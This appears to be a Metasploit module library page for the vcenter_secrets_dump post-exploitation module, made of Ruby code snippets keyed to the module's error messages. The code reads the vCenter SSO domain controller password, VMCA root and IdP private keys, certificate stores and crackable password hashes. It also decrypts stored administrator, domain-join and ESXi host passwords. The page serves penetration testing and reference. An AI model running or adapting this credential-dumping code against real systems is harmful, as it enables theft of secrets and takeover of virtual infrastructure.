133: unless is_fqdn?(vsphere_domain_name)
134: fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vSphere SSO domain name via lwregshell')
135: end
136:
137: self.base_fqdn = vsphere_domain_name.to_s.downcase
138: vprint_status("vSphere SSO Domain FQDN: #{base_fqdn}")
139:
Could not determine vmdir dcAccountDN from lwregshell
Here is a relevant code snippet related to the "Could not determine vmdir dcAccountDN from lwregshell" error message:
142: vprint_status("vSphere SSO Domain DN: #{base_dn}")
143:
144: vprint_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...')
145: vsphere_domain_dc_dn = get_domain_dc_dn
146: unless is_dn?(vsphere_domain_dc_dn)
147: fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountDN from lwregshell')
148: end
149:
150: self.bind_dn = vsphere_domain_dc_dn
151: print_good("vSphere SSO DC DN: #{bind_dn}")
152: self.bind_pw = get_domain_dc_password
Could not determine vmdir dcAccountPassword from lwregshell
Here is a relevant code snippet related to the "Could not determine vmdir dcAccountPassword from lwregshell" error message:
149:
150: self.bind_dn = vsphere_domain_dc_dn
151: print_good("vSphere SSO DC DN: #{bind_dn}")
152: self.bind_pw = get_domain_dc_password
153: unless bind_pw
154: fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountPassword from lwregshell')
155: end
156:
157: print_good("vSphere SSO DC PW: #{bind_pw}")
158: # clean up double quotes
159: # originally we wrapped in singles, but escaping of single quotes was not working, so prefer doubles
Error processing LDIF file
Here is a relevant code snippet related to the "Error processing LDIF file" error message:
179:
180: def vmdir_dump
181: print_status('Dumping vmdir schema to LDIF and storing to loot...')
182: vmdir_ldif = get_ldif_contents(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
183: if vmdir_ldif.nil?
184: print_error('Error processing LDIF file')
185: return
186: end
187:
188: p = store_loot('vmdir', 'LDIF', rhost, vmdir_ldif, 'vmdir.ldif', 'vCenter vmdir LDIF dump')
189: print_good("LDIF Dump: #{p}")
Empty vecs-cli store list returned from vCenter
Here is a relevant code snippet related to the "Empty vecs-cli store list returned from vCenter" error message:
218:
219: vecs_stores = get_vecs_stores
220: return if vecs_stores.nil?
221:
222: if vecs_stores.empty?
223: print_error('Empty vecs-cli store list returned from vCenter')
224: return
225: end
226:
227: vecs_stores.each do |vecs_store|
228: vecs_entries = get_vecs_entries(vecs_store)
Could not extract <STORE_LABEL> private key
Here is a relevant code snippet related to the "Could not extract <STORE_LABEL> private key" error message:
238: store_label = store_name.upcase
239:
240: vprint_status("Extract #{store_label} key ...")
241: key = get_vecs_private_key(store_name, vecs_entry['Alias'])
242: if key.nil?
243: print_bad("Could not extract #{store_label} private key")
244: else
245: p = store_loot(vecs_entry['Alias'], 'PEM', rhost, key.to_pem.to_s, "#{store_label}.key", "vCenter #{store_label} Private Key")
246: print_good("#{store_label} Key: #{p}")
247: end
248:
Could not extract <STORE_LABEL> certificate
Here is a relevant code snippet related to the "Could not extract <STORE_LABEL> certificate" error message:
247: end
248:
249: vprint_status("Extract #{store_label} certificate ...")
250: cert = validate_x509_cert(vecs_entry['Certificate'])
251: if cert.nil?
252: print_bad("Could not extract #{store_label} certificate")
253: return
254: end
255: p = store_loot(vecs_entry['Alias'], 'PEM', rhost, cert.to_pem.to_s, "#{store_label}.pem", "vCenter #{store_label} Certificate")
256: print_good("#{store_label} Cert: #{p}")
257:
Could not locate VMCA_ROOT keypair
Here is a relevant code snippet related to the "Could not locate VMCA_ROOT keypair" error message:
262:
263: def get_vmca_cert
264: vprint_status('Extract VMCA_ROOT key ...')
265:
266: unless file_exist?('/var/lib/vmware/vmca/privatekey.pem') && file_exist?('/var/lib/vmware/vmca/root.cer')
267: print_error('Could not locate VMCA_ROOT keypair')
268: return
269: end
270:
271: vmca_key_b64 = read_file('/var/lib/vmware/vmca/privatekey.pem')
272:
Could not extract VMCA_ROOT private key
Here is a relevant code snippet related to the "Could not extract VMCA_ROOT private key" error message:
270:
271: vmca_key_b64 = read_file('/var/lib/vmware/vmca/privatekey.pem')
272:
273: vmca_key = validate_pkey(vmca_key_b64)
274: if vmca_key.nil?
275: print_error('Could not extract VMCA_ROOT private key')
276: return
277: end
278:
279: p = store_loot('vmca', 'PEM', rhost, vmca_key, 'VMCA_ROOT.key', 'vCenter VMCA root CA private key')
280: print_good("VMCA_ROOT key: #{p}")
Could not extract VMCA_ROOT certificate
Here is a relevant code snippet related to the "Could not extract VMCA_ROOT certificate" error message:
282: vprint_status('Extract VMCA_ROOT cert ...')
283: vmca_cert_b64 = read_file('/var/lib/vmware/vmca/root.cer')
284:
285: vmca_cert = validate_x509_cert(vmca_cert_b64)
286: if vmca_cert.nil?
287: print_error('Could not extract VMCA_ROOT certificate')
288: return
289: end
290:
291: unless vmca_cert.check_private_key(vmca_key)
292: print_error('VMCA_ROOT certificate and private key mismatch')
VMCA_ROOT certificate and private key mismatch
Here is a relevant code snippet related to the "VMCA_ROOT certificate and private key mismatch" error message:
287: print_error('Could not extract VMCA_ROOT certificate')
288: return
289: end
290:
291: unless vmca_cert.check_private_key(vmca_key)
292: print_error('VMCA_ROOT certificate and private key mismatch')
293: return
294: end
295:
296: p = store_loot('vmca', 'PEM', rhost, vmca_cert, 'VMCA_ROOT.pem', 'vCenter VMCA root CA certificate')
297: print_good("VMCA_ROOT cert: #{p}")
No password hashes found
Here is a relevant code snippet related to the "No password hashes found" error message:
300: end
301:
302: # Shamelessly borrowed from vmware_vcenter_vmdir_ldap.rb
303: def process_hashes(entries)
304: if entries.empty?
305: print_warning('No password hashes found')
306: return
307: end
308:
309: service_details = {
310: workspace_id: myworkspace_id,
Type <TYPE> hash length is not 128 digits (<DN>)
Here is a relevant code snippet related to the "Type <TYPE> hash length is not 128 digits (<DN>)" error message:
324: type, hash, salt = entry[:userpassword].first.unpack('CH128H32')
325:
326: case type
327: when 1
328: unless hash.length == 128
329: vprint_error("Type #{type} hash length is not 128 digits (#{dn})")
330: next
331: end
332:
333: unless salt.length == 32
334: vprint_error("Type #{type} salt length is not 32 digits (#{dn})")
Type <TYPE> salt length is not 32 digits (<DN>)
Here is a relevant code snippet related to the "Type <TYPE> salt length is not 32 digits (<DN>)" error message:
329: vprint_error("Type #{type} hash length is not 128 digits (#{dn})")
330: next
331: end
332:
333: unless salt.length == 32
334: vprint_error("Type #{type} salt length is not 32 digits (#{dn})")
335: next
336: end
337:
338: # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
339: john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"
Hash type <TYPE.INSPECT> is not supported yet (<DN>)
Here is a relevant code snippet related to the "Hash type <TYPE.INSPECT> is not supported yet (<DN>)" error message:
336: end
337:
338: # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
339: john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"
340: else
341: vprint_error("Hash type #{type.inspect} is not supported yet (#{dn})")
342: next
343: end
344:
345: print_good("vSphere SSO User Credential: #{dn}:#{john_hash}")
346:
No SSO ID provider information found
Here is a relevant code snippet related to the "No SSO ID provider information found" error message:
353: end
354: end
355:
356: def process_sso_providers(entries)
357: if entries.empty?
358: print_warning('No SSO ID provider information found')
359: return
360: end
361:
362: if entries.is_a?(String)
363: entries = entries.split("\n")
Error extracting tenant and vpx AES encryption key
Here is a relevant code snippet related to the "Error extracting tenant and vpx AES encryption key" error message:
401:
402: def get_aes_keys_from_host
403: print_status('Extracting tenant and vpx AES encryption key...')
404:
405: tenant_key = get_aes_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
406: fail_with(Msf::Exploit::Failure::Unknown, 'Error extracting tenant and vpx AES encryption key') if tenant_key.nil?
407:
408: tenant_key.each do |aes_key|
409: aes_key_len = aes_key.length
410: # our first case is to process it out
411: case aes_key_len
Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got <AES_KEY_LEN>
Here is a relevant code snippet related to the "Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got <AES_KEY_LEN>" error message:
421: self.vc_sym_key = aes_key.scan(/../).map(&:hex).pack('C*')
422: self.vc_sym_key_raw = aes_key
423: print_good('vSphere vmware-vpx AES encryption')
424: print_good("\tHEX: #{aes_key}")
425: else
426: print_error("Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got #{aes_key_len}")
427: next
428: end
429:
430: extra_service_data = {
431: address: Rex::Socket.getaddress(rhost),
Error performing tenant_aes_decrypt
Here is a relevant code snippet related to the "Error performing tenant_aes_decrypt" error message:
463: decipher.decrypt
464: decipher.padding = 0
465: decipher.key = vc_tenant_aes_key
466: return (decipher.update(ciphertext) + decipher.final).delete("\000")
467: rescue StandardError => e
468: elog('Error performing tenant_aes_decrypt', error: e)
469: fail_with(Msf::Exploit::Failure::Unknown, 'Error performing tenant_aes_decrypt')
470: end
471:
472: def update_keystore(public_key, private_key)
473: if public_key.is_a? String
Error performing tenant_aes_decrypt
Here is a relevant code snippet related to the "Error performing tenant_aes_decrypt" error message:
464: decipher.padding = 0
465: decipher.key = vc_tenant_aes_key
466: return (decipher.update(ciphertext) + decipher.final).delete("\000")
467: rescue StandardError => e
468: elog('Error performing tenant_aes_decrypt', error: e)
469: fail_with(Msf::Exploit::Failure::Unknown, 'Error performing tenant_aes_decrypt')
470: end
471:
472: def update_keystore(public_key, private_key)
473: if public_key.is_a? String
474: cert = validate_x509_cert(public_key)
Error updating module keystore
Here is a relevant code snippet related to the "Error updating module keystore" error message:
481: key = private_key
482: end
483: cert_thumbprint = OpenSSL::Digest::SHA1.new(cert.to_der).to_s
484: keystore[cert_thumbprint] = key
485: rescue StandardError => e
486: elog('Error updating module keystore', error: e)
487: fail_with(Msf::Exploit::Failure::Unknown, 'Error updating module keystore')
488: end
489:
490: def get_idp_creds
491: vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
Error updating module keystore
Here is a relevant code snippet related to the "Error updating module keystore" error message:
482: end
483: cert_thumbprint = OpenSSL::Digest::SHA1.new(cert.to_der).to_s
484: keystore[cert_thumbprint] = key
485: rescue StandardError => e
486: elog('Error updating module keystore', error: e)
487: fail_with(Msf::Exploit::Failure::Unknown, 'Error updating module keystore')
488: end
489:
490: def get_idp_creds
491: vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
492: idp_keys = get_idp_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
Error processing IdP trusted certificate private key
Here is a relevant code snippet related to the "Error processing IdP trusted certificate private key" error message:
489:
490: def get_idp_creds
491: vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
492: idp_keys = get_idp_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
493: if idp_keys.nil?
494: print_error('Error processing IdP trusted certificate private key')
495: return
496: end
497:
498: idp_certs = get_idp_certs(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
499: if idp_certs.nil?
Error processing IdP trusted certificate chain
Here is a relevant code snippet related to the "Error processing IdP trusted certificate chain" error message:
495: return
496: end
497:
498: idp_certs = get_idp_certs(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
499: if idp_certs.nil?
500: print_error('Error processing IdP trusted certificate chain')
501: return
502: end
503:
504: vprint_status('Parsing vmwSTSTenantCredential certificates and keys ...')
505:
Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work
Here is a relevant code snippet related to the "Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work" error message:
516: sts_cert = stscert.to_pem.to_s
517: sts_key = stskey.to_pem.to_s
518: if validate_sts_cert(sts_cert)
519: vprint_status('Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate')
520: else # Query IDM to compare our extracted cert with the IDM advertised cert
521: print_warning('Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work')
522: end
523: sts_pem = "#{sts_key}#{sts_cert}"
524: end
525: end
526:
Unable to associate IdP certificate and private key
Here is a relevant code snippet related to the "Unable to associate IdP certificate and private key" error message:
523: sts_pem = "#{sts_key}#{sts_cert}"
524: end
525: end
526:
527: unless sts_pem # We were unable to link a public and private key together
528: print_error('Unable to associate IdP certificate and private key')
529: return
530: end
531:
532: p = store_loot('idp', 'application/x-pem-file', rhost, sts_key, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
533: print_good("SSO_STS_IDP key: #{p}")
No vSphere Licenses Found
Here is a relevant code snippet related to the "No vSphere Licenses Found" error message:
538: update_keystore(sts_cert, sts_key)
539: end
540:
541: def get_vc_licenses(entries)
542: if entries.empty?
543: print_warning('No vSphere Licenses Found')
544: return
545: end
546:
547: if entries.is_a?(String)
548: entries = entries.split("\n")
No vpx_customization_spec entries evident
Here is a relevant code snippet related to the "No vpx_customization_spec entries evident" error message:
573:
574: def enum_vm_cust_spec
575: vpx_customization_specs = get_vpx_customization_spec(shell_vcdb_pass, vcdb_user, vcdb_name)
576:
577: if vpx_customization_specs.nil?
578: print_warning('No vpx_customization_spec entries evident')
579: return
580: end
581:
582: vpx_customization_specs.each do |spec|
583: xmldoc = vpx_customization_specs[spec]
Could not determine DER byte length for vpx_customization_spec '<SPEC>'
Here is a relevant code snippet related to the "Could not determine DER byte length for vpx_customization_spec '<SPEC>'" error message:
581:
582: vpx_customization_specs.each do |spec|
583: xmldoc = vpx_customization_specs[spec]
584:
585: unless (enc_cert_len = xmldoc.at_xpath('/ConfigRoot/encryptionKey/_length').text.to_i)
586: print_error("Could not determine DER byte length for vpx_customization_spec '#{spec}'")
587: next
588: end
589:
590: enc_cert_der = []
591: der_idx = 0
Invalid encryption certificate for vpx_customization_spec '<SPEC>'
Here is a relevant code snippet related to the "Invalid encryption certificate for vpx_customization_spec '<SPEC>'" error message:
596: der_idx += 1
597: end
598:
599: enc_cert = validate_x509_cert(enc_cert_der.pack('C*'))
600: if enc_cert.nil?
601: print_error("Invalid encryption certificate for vpx_customization_spec '#{spec}'")
602: next
603: end
604:
605: enc_cert_thumbprint = OpenSSL::Digest::SHA1.new(enc_cert.to_der).to_s
606: vprint_status("Secrets for '#{spec}' were encrypted using public certificate with SHA1 digest #{enc_cert_thumbprint}")
Could not associate encryption public key with any of the private keys extracted from vCenter, skipping
Here is a relevant code snippet related to the "Could not associate encryption public key with any of the private keys extracted from vCenter, skipping" error message:
604:
605: enc_cert_thumbprint = OpenSSL::Digest::SHA1.new(enc_cert.to_der).to_s
606: vprint_status("Secrets for '#{spec}' were encrypted using public certificate with SHA1 digest #{enc_cert_thumbprint}")
607:
608: unless (enc_keystore_entry = keystore[enc_cert_thumbprint])
609: print_warning('Could not associate encryption public key with any of the private keys extracted from vCenter, skipping')
610: next
611: end
612:
613: vc_cipher_key = validate_pkey(enc_keystore_entry)
614: if vc_cipher_key.nil?
Could not access private key for VM Guest Customization Template '<SPEC>', cannot decrypt
Here is a relevant code snippet related to the "Could not access private key for VM Guest Customization Template '<SPEC>', cannot decrypt" error message:
610: next
611: end
612:
613: vc_cipher_key = validate_pkey(enc_keystore_entry)
614: if vc_cipher_key.nil?
615: print_error("Could not access private key for VM Guest Customization Template '#{spec}', cannot decrypt")
616: next
617: end
618:
619: unless enc_cert.check_private_key(vc_cipher_key)
620: print_error("vCenter private key does not associate with public key for VM Guest Customization Template '#{spec}', cannot decrypt")
vCenter private key does not associate with public key for VM Guest Customization Template '<SPEC>', cannot decrypt
Here is a relevant code snippet related to the "vCenter private key does not associate with public key for VM Guest Customization Template '<SPEC>', cannot decrypt" error message:
615: print_error("Could not access private key for VM Guest Customization Template '#{spec}', cannot decrypt")
616: next
617: end
618:
619: unless enc_cert.check_private_key(vc_cipher_key)
620: print_error("vCenter private key does not associate with public key for VM Guest Customization Template '#{spec}', cannot decrypt")
621: next
622: end
623:
624: key_digest = OpenSSL::Digest::SHA1.new(vc_cipher_key.to_der).to_s
625: vprint_status("Decrypt using #{vc_cipher_key.n.num_bits}-bit #{vc_cipher_key.oid} SHA1: #{key_digest}")
Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'
Here is a relevant code snippet related to the "Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'" error message:
636: when 'false'
637: secret_ciphertext = sysprep_element_unattend.xpath('//guiUnattended/password/value').text
638: ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse
639: secret_plaintext = vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete("\000")
640: else
641: print_error("Malformed XML received from vCenter for VM Guest Customization Template '#{spec}'")
642: next
643: end
644: print_status("Initial administrator account password found for vpx_customization_spec '#{spec}':")
645: print_good("\tInitial Admin PW: #{secret_plaintext}")
646:
Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'
Here is a relevant code snippet related to the "Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'" error message:
673: when 'false'
674: secret_ciphertext = sysprep_element_unattend.xpath('//identification/domainAdminPassword/value').text
675: ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse
676: secret_plaintext = vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete("\000")
677: else
678: print_error("Malformed XML received from vCenter for VM Guest Customization Template '#{spec}'")
679: next
680: end
681:
682: print_status("AD domain join account found for vpx_customization_spec '#{spec}':")
683:
No ESXi hosts attached to this vCenter system
Here is a relevant code snippet related to the "No ESXi hosts attached to this vCenter system" error message:
707:
708: def enum_vpx_user_creds
709: vpxuser_rows = get_vpx_users(shell_vcdb_pass, vcdb_user, vcdb_name, vc_sym_key)
710:
711: if vpxuser_rows.nil?
712: print_warning('No ESXi hosts attached to this vCenter system')
713: return
714: end
715:
716: vpxuser_rows.each do |user|
717: print_good("ESXi Host #{user['fqdn']} [#{user['ip']}]\t LOGIN: #{user['user']} PASS: #{user['password']}")
Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM
Here is a relevant code snippet related to the "Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM" error message:
768: vprint_status('Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...')
769:
770: idm_cmd = cmd_exec("curl -f -s http://localhost:7080/idm/tenant/#{base_fqdn}/certificates?scope=TENANT")
771:
772: if idm_cmd.blank?
773: print_error('Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM')
774: return false
775: end
776:
777: if (idm_json = JSON.parse(idm_cmd).first)
778: idm_json['certificates'].each do |idm|
Invalid x509 certificate extracted from IDM!
Here is a relevant code snippet related to the "Invalid x509 certificate extracted from IDM!" error message:
776:
777: if (idm_json = JSON.parse(idm_cmd).first)
778: idm_json['certificates'].each do |idm|
779: cert_verify = validate_x509_cert(idm['encoded'])
780: if cert_verify.nil?
781: print_error('Invalid x509 certificate extracted from IDM!')
782: return false
783: end
784: next unless cert == cert_verify
785:
786: return true
Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter
Here is a relevant code snippet related to the "Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter" error message:
784: next unless cert == cert_verify
785:
786: return true
787: end
788: else
789: print_error('Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter')
790: return false
791: end
792:
793: print_error('No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/')
794: false
No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/
Here is a relevant code snippet related to the "No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/" error message:
788: else
789: print_error('Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter')
790: return false
791: end
792:
793: print_error('No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/')
794: false
795: end
796:
797: def validate_target
798: # this enumeration phase will also go away once the sso part moves to lib
Could not find <V>
Here is a relevant code snippet related to the "Could not find <V>" error message:
798: # this enumeration phase will also go away once the sso part moves to lib
799: vprint_status('Enumerating universal vSphere binaries ...')
800: vsphere_bin.each do |k, v|
801: vprint_good("\t#{k}: #{v}")
802: unless command_exists?(v)
803: fail_with(Msf::Exploit::Failure::NoTarget, "Could not find #{v}")
804: end
805: end
806:
807: if vcenter_management
808: vc_db_type = get_database_type
This module only supports embedded PostgreSQL, appliance reports DB type '<VC_DB_TYPE>'
Here is a relevant code snippet related to the "This module only supports embedded PostgreSQL, appliance reports DB type '<VC_DB_TYPE>'" error message:
805: end
806:
807: if vcenter_management
808: vc_db_type = get_database_type
809: unless vc_db_type == 'embedded'
810: fail_with(Msf::Exploit::Failure::NoTarget, "This module only supports embedded PostgreSQL, appliance reports DB type '#{vc_db_type}'")
811: end
812:
813: unless command_exists?(psql_bin)
814: fail_with(Msf::Exploit::Failure::NoTarget, "Could not find #{psql_bin}")
815: end
Could not find <PSQL_BIN>
Here is a relevant code snippet related to the "Could not find <PSQL_BIN>" error message:
809: unless vc_db_type == 'embedded'
810: fail_with(Msf::Exploit::Failure::NoTarget, "This module only supports embedded PostgreSQL, appliance reports DB type '#{vc_db_type}'")
811: end
812:
813: unless command_exists?(psql_bin)
814: fail_with(Msf::Exploit::Failure::NoTarget, "Could not find #{psql_bin}")
815: end
816: end
817:
818: self.vcenter_fqdn = get_fqdn
819: if vcenter_fqdn.nil?
Could not determine vCenter DNS FQDN
Here is a relevant code snippet related to the "Could not determine vCenter DNS FQDN" error message:
815: end
816: end
817:
818: self.vcenter_fqdn = get_fqdn
819: if vcenter_fqdn.nil?
820: print_bad('Could not determine vCenter DNS FQDN')
821: self.vcenter_fqdn = ''
822: end
823:
824: vsphere_machine_ipv4 = get_ipv4
825: if vsphere_machine_ipv4.nil? || !Rex::Socket.is_ipv4?(vsphere_machine_ipv4)
Could not determine vCenter IPv4 address
Here is a relevant code snippet related to the "Could not determine vCenter IPv4 address" error message:
821: self.vcenter_fqdn = ''
822: end
823:
824: vsphere_machine_ipv4 = get_ipv4
825: if vsphere_machine_ipv4.nil? || !Rex::Socket.is_ipv4?(vsphere_machine_ipv4)
826: print_bad('Could not determine vCenter IPv4 address')
827: else
828: print_status("Appliance IPv4: #{vsphere_machine_ipv4}")
829: end
830:
831: self.vc_psc_fqdn = get_platform_service_controller(vc_type_management)
Could not find /etc/vmware/deployment.node.type
Here is a relevant code snippet related to the "Could not find /etc/vmware/deployment.node.type" error message:
853: self.vc_type_management = false
854:
855: vcsa_type = get_deployment_type
856: case vcsa_type
857: when nil
858: fail_with(Msf::Exploit::Failure::BadConfig, 'Could not find /etc/vmware/deployment.node.type')
859: when 'embedded' # Integrated vCenter and PSC
860: self.vc_deployment_type = 'vCenter Appliance (Embedded)'
861: self.vc_type_embedded = true
862: when 'infrastructure' # PSC only
863: self.vc_deployment_type = 'vCenter Platform Service Controller'
Unable to determine appliance deployment type returned from server: <VCSA_TYPE>
Here is a relevant code snippet related to the "Unable to determine appliance deployment type returned from server: <VCSA_TYPE>" error message:
864: self.vc_type_infrastructure = true
865: when 'management' # vCenter only
866: self.vc_deployment_type = 'vCenter Appliance (Management)'
867: self.vc_type_management = true
868: else
869: fail_with(Msf::Exploit::Failure::Unknown, "Unable to determine appliance deployment type returned from server: #{vcsa_type}")
870: end
871:
872: if vcenter_management
873: self.vcsa_build = get_vcenter_build
874: end
Go back to menu.
Related Pull Requests
- #17213 Merged Pull Request: Update identify hash library and call
- #16871 Merged Pull Request: Add vcenter_secrets_dump post module
Go back to menu.
See Also
Check also the following modules related to this module:
- post/linux/gather/checkcontainer
- post/linux/gather/checkvm
- post/linux/gather/ecryptfs_creds
- post/linux/gather/enum_commands
- post/linux/gather/enum_configs
- post/linux/gather/enum_containers
- post/linux/gather/enum_nagios_xi
- post/linux/gather/enum_network
- post/linux/gather/enum_protections
- post/linux/gather/enum_psk
- post/linux/gather/enum_system
- post/linux/gather/enum_users_history
- post/linux/gather/gnome_commander_creds
- post/linux/gather/gnome_keyring_dump
- post/linux/gather/haserl_read
- post/linux/gather/hashdump
- post/linux/gather/manageengine_password_manager_creds
- post/linux/gather/mimipenguin
- post/linux/gather/mount_cifs_creds
- post/linux/gather/openvpn_credentials
- post/linux/gather/phpmyadmin_credsteal
- post/linux/gather/pptpd_chap_secrets
- post/linux/gather/tor_hiddenservices
Authors
npm[at]cesium137.io
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.